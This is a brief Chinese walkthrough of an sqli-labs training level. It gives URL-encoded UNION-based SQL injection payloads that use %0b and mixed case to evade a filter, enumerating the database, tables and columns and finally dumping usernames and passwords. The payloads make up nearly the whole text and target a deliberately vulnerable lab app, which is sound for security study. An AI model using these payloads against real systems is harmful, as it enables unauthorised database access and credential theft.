1.和Less(27)一样,就是把单引号闭合变成双引号闭合
验证一下:?id=0"%0bor(1)=(1)%26%26%0b"1
2.爆破:
(1)爆库: ?id=0"%0buniOn%0bsElEct%0b1,database(),3%0bor%0b"1"="1
(2)爆表:?id=0"%0buniOn%0bsElEct%0b1,(group_concat(table_name)),3%0bfrom%0binformation_schema.tables%0bwhere%0btable_schema='security'%0b%26%26%0b"1"="1
(3)爆列名:?id=0"%0buniOn%0bsElEct%0b1,(group_concat(column_name)),3%0bfrom%0binformation_schema.columns%0bwhere%0btable_schema='security'%0bAnd%0btable_name='users'%0b%26%26%0b"1"="1
(4)爆值:?id=0"%0buniOn%0bsElEct%0b1,(group_concat(username,0x7e,password)),3%0bfrom%0busers%0buniOn%0bseLect (1),(2),"(3
